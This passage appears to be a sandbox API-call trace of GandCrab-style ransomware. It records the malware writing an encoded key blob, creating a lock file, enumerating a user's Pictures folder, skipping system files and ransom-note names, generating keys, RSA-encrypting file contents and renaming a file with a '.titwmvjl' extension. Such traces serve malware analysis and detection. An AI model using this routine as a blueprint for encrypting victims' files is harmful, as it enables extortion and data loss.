x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.108] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0094.109] CloseHandle (hObject=0x2cc) returned 1 [0094.109] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.109] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.109] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x1ac)) [0094.109] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.110] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.110] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.110] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\d2ca4a09d2ca4deb61a.lock") returned 103 [0094.110] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0094.111] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.111] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.111] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\") returned 79 [0094.111] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\*" [0094.111] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5037f8 [0094.111] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.111] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.112] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.112] lstrcmpW (lpString1="3UaE2H4hje.bmp", lpString2=".") returned 1 [0094.112] lstrcmpW (lpString1="3UaE2H4hje.bmp", lpString2="..") returned 1 [0094.112] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\", lpString2="3UaE2H4hje.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp" [0094.112] lstrlenW (lpString=".titwmvjl") returned 9 [0094.112] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp") returned 93 [0094.112] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.112] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp.titwmvjl") returned 102 [0094.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp") returned 93 [0094.113] lstrlenW (lpString=".bmp") returned 4 [0094.113] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.113] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0094.113] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0094.113] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp") returned 93 [0094.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp") returned 93 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="desktop.ini") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="autorun.inf") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="ntuser.dat") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="iconcache.db") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="bootsect.bak") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="boot.ini") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="ntuser.dat.log") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="thumbs.db") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.113] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0094.114] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="CRAB-DECRYPT.html") returned -1 [0094.114] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.114] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.114] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="ntldr") returned -1 [0094.114] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="NTDETECT.COM") returned -1 [0094.114] lstrcmpiW (lpString1="3UaE2H4hje.bmp", lpString2="Bootfont.bin") returned -1 [0094.114] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp") returned 93 [0094.114] lstrlenW (lpString=".bmp") returned 4 [0094.114] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.114] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0094.114] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.114] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.114] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\3uae2h4hje.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0094.115] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.115] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0094.116] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.116] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.117] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.117] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.117] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.117] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0094.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.117] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.117] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.118] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.118] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.119] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.119] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.119] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0094.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.119] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.119] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.119] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.120] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5033b8) returned 1 [0094.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.120] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.121] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.121] GetLastError () returned 0x0 [0094.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.121] CryptDestroyKey (hKey=0x5033b8) returned 1 [0094.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.122] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.122] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.122] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5037b8) returned 1 [0094.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.123] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.123] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.123] GetLastError () returned 0x0 [0094.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.123] CryptDestroyKey (hKey=0x5037b8) returned 1 [0094.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.124] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.124] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.124] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.124] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x1820, lpOverlapped=0x0) returned 1 [0094.135] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffe7e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.136] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x1820, lpOverlapped=0x0) returned 1 [0094.144] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.144] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0094.145] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.150] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.150] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.151] CloseHandle (hObject=0x2d4) returned 1 [0094.151] MoveFileExW 